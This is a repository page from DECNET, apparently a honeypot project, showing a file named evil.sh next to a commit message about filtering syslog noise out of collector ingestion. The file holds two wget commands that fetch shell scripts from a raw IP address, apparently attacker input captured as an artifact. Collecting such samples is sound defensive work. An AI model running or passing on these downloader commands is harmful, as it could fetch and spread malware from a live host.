DECNET/artifacts/evil.sh at 8a93ee312988aedc3a8f467bbf65d33cb96faeac - DECNET - RESACA Chile: Donde la ciberseguridad se chupa una chela.

anti/DECNET

Files

anti 88f276e9e7 feat(collector): drop native unix daemon syslog from ingestion

sshd, pam_unix, sudo, CRON, systemd, kernel, rsyslogd, and dbus-daemon
all share the SSH/telnet decky containers and write to the same syslog
socket as DECNET's own emitters. Their output was being parsed and
ingested into the JSON stream, the dashboard, and the profiler — pure
noise: sshd's "Failed password for root from X" duplicates the
auth-helper's structured auth_attempt event, pam_unix repeats it again,
CRON/systemd say nothing about attacker behavior.

Drop these APP-NAMEs in _should_ingest before the JSON write and bus
publish. Raw .log file still captures everything for forensics. The
denylist is overridable with DECNET_COLLECTOR_DROP_APPS so operators
can extend it without code changes.

2026-04-28 19:21:39 -04:00

4 lines

91 B

Bash

Raw Blame History

	`wget http://31.56.209.39/wget.sh -o wget.sh`

	`wget http://31.56.209.39/curl.sh -o curl.sh`